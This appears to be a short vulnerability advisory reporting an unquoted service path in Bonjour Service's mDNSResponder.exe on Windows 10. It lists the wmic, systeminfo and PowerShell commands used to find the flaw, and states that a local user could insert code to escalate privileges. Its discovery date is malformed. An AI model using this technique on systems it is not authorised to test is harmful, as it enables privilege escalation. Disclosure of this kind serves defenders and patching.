Bonjour Service 'mDNSResponder.exe' Exploit, Unquoted Service Path Privilege Escalation

# Exploit Title: Bonjour Service - 'mDNSResponder.exe'  Unquoted Service
Path
# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Bonjour Service
           Bonjour Service
C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe
                                                    Auto

C:\>systeminfo

Host Name:                 DESKTOP-HFBJOBG
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19045 N/A Build 19045

PS C:\Program Files\Blizzard\Bonjour Service> powershell -command
"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
>>
3,0,0,10

#Exploit:

There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .
This may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate privileges.

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD